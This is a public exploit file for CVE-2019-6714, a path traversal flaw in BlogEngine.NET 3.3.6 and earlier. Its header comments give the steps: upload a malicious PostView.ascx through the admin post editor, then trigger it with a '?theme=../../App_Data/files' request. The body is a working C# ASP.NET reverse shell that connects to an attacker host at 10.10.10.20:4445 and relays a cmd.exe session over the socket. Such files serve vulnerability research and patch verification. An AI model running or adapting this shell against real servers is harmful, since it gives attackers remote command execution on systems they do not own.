92 lines
No EOL
3.3 KiB
C#
92 lines
No EOL
3.3 KiB
C#
# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
|
|
# Date: 02-11-2019
|
|
# Exploit Author: Dustin Cobb
|
|
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
|
|
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
|
|
# Version: <= 3.3.6
|
|
# Tested on: Windows 2016 Standard / IIS 10.0
|
|
# CVE : CVE-2019-6714
|
|
|
|
/*
|
|
* CVE-2019-6714
|
|
*
|
|
* Path traversal vulnerability leading to remote code execution. This
|
|
* vulnerability affects BlogEngine.NET versions 3.3.6 and below. This
|
|
* is caused by an unchecked "theme" parameter that is used to override
|
|
* the default theme for rendering blog pages. The vulnerable code can
|
|
* be seen in this file:
|
|
*
|
|
* /Custom/Controls/PostList.ascx.cs
|
|
*
|
|
* Attack:
|
|
*
|
|
* First, we set the TcpClient address and port within the method below to
|
|
* our attack host, who has a reverse tcp listener waiting for a connection.
|
|
* Next, we upload this file through the file manager. In the current (3.3.6)
|
|
* version of BlogEngine, this is done by editing a post and clicking on the
|
|
* icon that looks like an open file in the toolbar. Note that this file must
|
|
* be uploaded as PostView.ascx. Once uploaded, the file will be in the
|
|
* /App_Data/files directory off of the document root. The admin page that
|
|
* allows upload is:
|
|
*
|
|
* http://10.10.10.10/admin/app/editor/editpost.cshtml
|
|
*
|
|
*
|
|
* Finally, the vulnerability is triggered by accessing the base URL for the
|
|
* blog with a theme override specified like so:
|
|
*
|
|
* http://10.10.10.10/?theme=../../App_Data/files
|
|
*
|
|
*/
|
|
|
|
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
|
|
<%@ Import Namespace="BlogEngine.Core" %>
|
|
|
|
<script runat="server">
|
|
static System.IO.StreamWriter streamWriter;
|
|
|
|
protected override void OnLoad(EventArgs e) {
|
|
base.OnLoad(e);
|
|
|
|
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
|
|
using(System.IO.Stream stream = client.GetStream()) {
|
|
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
|
|
streamWriter = new System.IO.StreamWriter(stream);
|
|
|
|
StringBuilder strInput = new StringBuilder();
|
|
|
|
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
|
p.StartInfo.FileName = "cmd.exe";
|
|
p.StartInfo.CreateNoWindow = true;
|
|
p.StartInfo.UseShellExecute = false;
|
|
p.StartInfo.RedirectStandardOutput = true;
|
|
p.StartInfo.RedirectStandardInput = true;
|
|
p.StartInfo.RedirectStandardError = true;
|
|
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
|
|
p.Start();
|
|
p.BeginOutputReadLine();
|
|
|
|
while(true) {
|
|
strInput.Append(rdr.ReadLine());
|
|
p.StandardInput.WriteLine(strInput);
|
|
strInput.Remove(0, strInput.Length);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
|
|
StringBuilder strOutput = new StringBuilder();
|
|
|
|
if (!String.IsNullOrEmpty(outLine.Data)) {
|
|
try {
|
|
strOutput.Append(outLine.Data);
|
|
streamWriter.WriteLine(strOutput);
|
|
streamWriter.Flush();
|
|
} catch (Exception err) { }
|
|
}
|
|
}
|
|
|
|
</script>
|
|
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder> |